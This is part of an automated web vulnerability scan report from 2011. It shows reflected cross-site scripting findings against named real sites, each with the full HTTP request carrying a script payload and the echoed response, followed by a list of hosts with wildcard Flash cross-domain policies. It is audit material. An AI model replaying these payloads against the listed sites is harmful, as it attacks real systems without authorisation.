The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c242"><script>alert(1)</script>4a7447b872b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sports/m-footbl/98741344c242"><script>alert(1)</script>4a7447b872b HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LDCLGFbrowser=1502b25b-b7d1-4145-af20-3ce33b17a67e; __utma=46806371.1571180321.1315097071.1315097071.1315097071.1; __utmb=46806371.1.10.1315097071; __utmc=46806371; __utmz=46806371.1315097071.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:45:04 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 34048

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sports/m-footbl/98741344c242"><script>alert(1)</script>4a7447b872b','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.101. http://www.und.com/sports/m-footbl/9874134 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.und.com
Path:	/sports/m-footbl/9874134

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 827d3"><script>alert(1)</script>ef15667ce85 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sports/m-footbl/9874134?827d3"><script>alert(1)</script>ef15667ce85=1 HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LDCLGFbrowser=1502b25b-b7d1-4145-af20-3ce33b17a67e; __utma=46806371.1571180321.1315097071.1315097071.1315097071.1; __utmb=46806371.1.10.1315097071; __utmc=46806371; __utmz=46806371.1315097071.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:45:00 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 33922

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sports/m-footbl/9874134?827d3"><script>alert(1)</script>ef15667ce85=1','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.102. http://optimized-by.rubiconproject.com/a/4462/5032/7102-15.js [ruid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/4462/5032/7102-15.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cf530"-alert(1)-"8e103b168e9 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /a/4462/5032/7102-15.js?cb=0.3047261026222259 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; ruid=cf530"-alert(1)-"8e103b168e9; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=5032^1&9346^1; csi2=3214995.js^2^1315096957^1315097051; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; ses15=5032^1&9346^1; csi15=3203911.js^1^1315097079^1315097079; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:54:11 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=4462/5032; expires=Sun, 04-Sep-2011 01:54:11 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Sun, 04-Sep-2011 01:54:11 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=5032^49&9346^125a76039212413077175f84d; expires=Mon, 05-Sep-2011 05:59:59 GMT; max-age=111948; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1308

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3188089"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=cf530"-alert(1)-"8e103b168e9\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

5.103. http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html [ruid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/4462/5032/7102-2.html

Issue detail

The value of the ruid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1cf42"><script>alert(1)</script>c5205d82800 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /a/4462/5032/7102-2.html HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; ruid=1cf42"><script>alert(1)</script>c5205d82800; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=5032^1&9346^1; csi2=3214995.js^2^1315096957^1315097051; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rdk=4462/5032; rdk15=0; ses15=5032^2&9346^1; csi15=3214998.js^1^1315097284^1315097284&3203911.js^1^1315097079^1315097079

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:55:34 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=4462/5032; expires=Sun, 04-Sep-2011 01:55:34 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Sun, 04-Sep-2011 01:55:34 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=5032^42&9346^125a7603945366735abcf916; expires=Mon, 05-Sep-2011 05:59:59 GMT; max-age=111865; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 1413

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...
<img src="http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=1cf42"><script>alert(1)</script>c5205d82800" style="display: none;" border="0" height="1" width="1" alt=""/>
...[SNIP]...

5.104. http://rma-api.gravity.com/v1/beacons/initialize [vaguid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rma-api.gravity.com
Path:	/v1/beacons/initialize

Issue detail

The value of the vaguid cookie is copied into the HTML document as plain text between tags. The payload 5ec60<script>alert(1)</script>be5955fe51a was submitted in the vaguid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0 JSP/2.2 (Oracle GlassFish Server 3.1 Java/Sun Microsystems Inc./1.6)
Server: Oracle GlassFish Server 3.1
P3P: CP="NOI DSP COR ADMa OUR NOR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 111
Date: Sun, 04 Sep 2011 01:01:01 GMT
Connection: close
Set-Cookie: vaguid=172d38ad2d9b9b5aa42030c637b398395ec60<script>alert(1)</script>be5955fe51a; Domain=.gravity.com; Expires=Sat, 05-May-2063 02:02:02 GMT; Path=/

GravityInsights.cc('grvinsights', '172d38ad2d9b9b5aa42030c637b398395ec60<script>alert(1)</script>be5955fe51a');

5.105. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [JSESSIONID cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://snas.nbcuni.com
Path:	/snas/api/getRemoteDomainCookies

Issue detail

The value of the JSESSIONID cookie is copied into the HTML document as plain text between tags. The payload c7a2a<script>alert(1)</script>9489ac10615 was submitted in the JSESSIONID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:54:02 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Set-Cookie: JSESSIONID=C58B4400F3879E26517C8A2E3ECF06E2c7a2a<script>alert(1)</script>9489ac10615; Path=/
Cache-Control: max-age=10
Expires: Sun, 04 Sep 2011 00:54:12 GMT
Content-Length: 131
Content-Type: text/html

__nbcsnasadops.doSCallback({ "cookie":{"JSESSIONID":"C58B4400F3879E26517C8A2E3ECF06E2c7a2a<script>alert(1)</script>9489ac10615"}});

6. Flash cross-domain policy previous next
There are 65 instances of this issue:

http://ad.afy11.net/crossdomain.xml
http://ad.turn.com/crossdomain.xml
http://altfarm.mediaplex.com/crossdomain.xml
http://api.bit.ly/crossdomain.xml
http://b.scorecardresearch.com/crossdomain.xml
http://bh.contextweb.com/crossdomain.xml
http://c.betrad.com/crossdomain.xml
http://c.casalemedia.com/crossdomain.xml
http://cdn.gigya.com/crossdomain.xml
http://cdn.taboolasyndication.com/crossdomain.xml
http://cdn.turn.com/crossdomain.xml
http://ce.lijit.com/crossdomain.xml
http://gannett.gcion.com/crossdomain.xml
http://get.lingospot.com/crossdomain.xml
http://gscounters.gigya.com/crossdomain.xml
http://i.casalemedia.com/crossdomain.xml
http://ib.adnxs.com/crossdomain.xml
http://img-cdn.mediaplex.com/crossdomain.xml
http://img.mediaplex.com/crossdomain.xml
http://imp.fetchback.com/crossdomain.xml
http://init.lingospot.com/crossdomain.xml
http://l.betrad.com/crossdomain.xml
http://m.xp1.ru4.com/crossdomain.xml
http://metrics.sprint.com/crossdomain.xml
http://nmsacramento.112.2o7.net/crossdomain.xml
http://pix04.revsci.net/crossdomain.xml
http://pixel.mathtag.com/crossdomain.xml
http://pixel.quantserve.com/crossdomain.xml
http://premium.mookie1.com/crossdomain.xml
http://query.yahooapis.com/crossdomain.xml
http://r.casalemedia.com/crossdomain.xml
http://r.turn.com/crossdomain.xml
http://rcv-srv48.inplay.tubemogul.com/crossdomain.xml
http://s.meebocdn.net/crossdomain.xml
http://s0.2mdn.net/crossdomain.xml
http://secure-us.imrworldwide.com/crossdomain.xml
https://socialize.gigya.com/crossdomain.xml
http://statse.webtrendslive.com/crossdomain.xml
http://sync.adap.tv/crossdomain.xml
http://sync.mathtag.com/crossdomain.xml
http://tags.bluekai.com/crossdomain.xml
http://tcr.tynt.com/crossdomain.xml
http://trc.taboolasyndication.com/crossdomain.xml
http://turn.nexac.com/crossdomain.xml
http://usatoday1.112.2o7.net/crossdomain.xml
http://wa.proflowers.com/crossdomain.xml
http://www.wunderground.com/crossdomain.xml
http://adadvisor.net/crossdomain.xml
http://ads.adbrite.com/crossdomain.xml
http://cim.meebo.com/crossdomain.xml
http://cm.npc-mcclatchy.overture.com/crossdomain.xml
http://content.usatoday.com/crossdomain.xml
http://grfx.cstv.com/crossdomain.xml
http://mi.adinterax.com/crossdomain.xml
http://optimized-by.rubiconproject.com/crossdomain.xml
http://rd.meebo.com/crossdomain.xml
http://snas.nbcuni.com/crossdomain.xml
http://syndication.mmismm.com/crossdomain.xml
http://www.facebook.com/crossdomain.xml
http://www.meebo.com/crossdomain.xml
http://www.reuters.com/crossdomain.xml
http://www.sacbee.com/crossdomain.xml
http://www.youtube.com/crossdomain.xml
http://api.twitter.com/crossdomain.xml
http://sales.reuters.com/crossdomain.xml

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

6.1. http://ad.afy11.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.afy11.net
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.afy11.net

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Mon, 05 Feb 2007 18:48:56 GMT
Accept-Ranges: bytes
ETag: "e732374a5649c71:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:56:35 GMT
Connection: close
Content-Length: 201

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

6.2. http://ad.turn.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: private
Pragma: private
Expires: Sun, 04 Sep 2011 00:55:06 GMT
Content-Type: text/xml;charset=UTF-8
Date: Sun, 04 Sep 2011 00:55:05 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

6.3. http://altfarm.mediaplex.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://altfarm.mediaplex.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: altfarm.mediaplex.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"204-1158796163000"
Last-Modified: Wed, 20 Sep 2006 23:49:23 GMT
Content-Type: text/xml
Content-Length: 204
Date: Sun, 04 Sep 2011 00:53:45 GMT
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

6.4. http://api.bit.ly/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.bit.ly
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: api.bit.ly

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 04 Sep 2011 00:49:05 GMT
Content-Type: text/xml
Content-Length: 141
Last-Modified: Wed, 25 May 2011 20:29:51 GMT
Connection: close
Expires: Tue, 06 Sep 2011 00:49:05 GMT
Cache-Control: max-age=172800
Accept-Ranges: bytes

<?xml version="1.0"?>

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

6.5. http://b.scorecardresearch.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Mon, 05 Sep 2011 00:49:46 GMT
Date: Sun, 04 Sep 2011 00:49:46 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

6.6. http://bh.contextweb.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bh.contextweb.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: bh.contextweb.com

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
Accept-Ranges: bytes
ETag: W/"269-1314729062000"
Last-Modified: Tue, 30 Aug 2011 18:31:02 GMT
Content-Type: application/xml
Content-Length: 269
Date: Sun, 04 Sep 2011 00:56:36 GMT
Connection: Keep-Alive
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

6.7. http://c.betrad.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://c.betrad.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: c.betrad.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "623d3896f3768c2bad5e01980f958d0a:1298927864"
Last-Modified: Mon, 28 Feb 2011 21:17:44 GMT
Accept-Ranges: bytes
Content-Length: 204
Content-Type: application/xml
Date: Sun, 04 Sep 2011 00:55:17 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

6.8. http://c.casalemedia.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://c.casalemedia.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: c.casalemedia.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 25 Feb 2011 02:26:25 GMT
ETag: "14b0e12-e6-e7eb640"
Accept-Ranges: bytes
Content-Length: 230
Content-Type: text/xml
Expires: Sun, 04 Sep 2011 00:58:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 00:58:17 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

6.9. http://cdn.gigya.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cdn.gigya.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.gigya.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Thu, 31 Mar 2011 15:00:41 GMT
ETag: "80b2ea66b4efcb1:0"
Server: Microsoft-IIS/7.5
X-Server: web103
Cache-Control: max-age=86400
Date: Sun, 04 Sep 2011 00:52:13 GMT
Content-Length: 355
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="mas
...[SNIP]...
<allow-access-from domain="*" to-ports="80" />
...[SNIP]...
<allow-access-from domain="*" to-ports="443" secure="false" />
...[SNIP]...

6.10. http://cdn.taboolasyndication.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cdn.taboolasyndication.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.taboolasyndication.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:49:13 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Sun, 02 Jan 2011 13:38:59 GMT
ETag: "578002-199-498dd2859a2c0"
Accept-Ranges: bytes
Content-Length: 409
Content-Type: text/xml
Cache-Control: private, max-age=31536000
Age: 20954886
Expires: Wed, 04 Jan 2012 12:01:07 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />
<allow-access-from domain="*"/>
<allow-access-from domain="*" secure="false"/>
<allow-access-from domain="*" to-ports="80,443"/>
...[SNIP]...

6.11. http://cdn.turn.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cdn.turn.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.turn.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Pragma: private
Content-Type: text/xml;charset=UTF-8
Cache-Control: private, max-age=0
Expires: Sun, 04 Sep 2011 00:55:27 GMT
Date: Sun, 04 Sep 2011 00:55:27 GMT
Content-Length: 100
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

6.12. http://ce.lijit.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ce.lijit.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ce.lijit.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:58:09 GMT
Server: PWS/1.7.3.3
X-Px: ht lax-agg-n15.panthercdn.com
ETag: "7955a-83-4aad025722640"
Cache-Control: max-age=604800
Expires: Fri, 09 Sep 2011 13:20:56 GMT
Age: 128233
Content-Length: 131
Content-Type: application/xml
Last-Modified: Thu, 18 Aug 2011 23:41:05 GMT
Connection: close

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*"/>
</cross-domain-policy>

6.13. http://gannett.gcion.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://gannett.gcion.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: gannett.gcion.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache
Content-Type: text/xml
Content-Length: 111

<?xml version="1.0" ?><cross-domain-policy><allow-access-from domain="*" secure="true" /></cross-domain-policy>

6.14. http://get.lingospot.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://get.lingospot.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: get.lingospot.com

Response

HTTP/1.0 200 OK
Connection: close
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "-1221676599"
Last-Modified: Tue, 02 Dec 2008 06:03:41 GMT
Content-Length: 139
Date: Sun, 04 Sep 2011 01:08:26 GMT
Server: lingo

<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permitted-cross-domain-policies="master-only"/>
</cross-domain-policy>

6.15. http://gscounters.gigya.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://gscounters.gigya.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: gscounters.gigya.com

Response

HTTP/1.1 200 OK
Content-Length: 341
Content-Type: text/xml
Last-Modified: Tue, 08 Sep 2009 07:27:09 GMT
Accept-Ranges: bytes
ETag: "c717c7c65530ca1:2d6b"
Server: Microsoft-IIS/6.0
P3P: CP="IDC COR PSA DEV ADM OUR IND ONL"
x-server: web204
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:52:28 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-on
...[SNIP]...
<allow-access-from domain="*" to-ports="80" />
...[SNIP]...
<allow-access-from domain="*" to-ports="443" secure="false" />
...[SNIP]...

6.16. http://i.casalemedia.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://i.casalemedia.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: i.casalemedia.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 25 Feb 2011 02:27:27 GMT
ETag: "15690dc-e6-1230c1c0"
Accept-Ranges: bytes
Content-Length: 230
Content-Type: text/xml
Expires: Sun, 04 Sep 2011 00:53:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 00:53:06 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
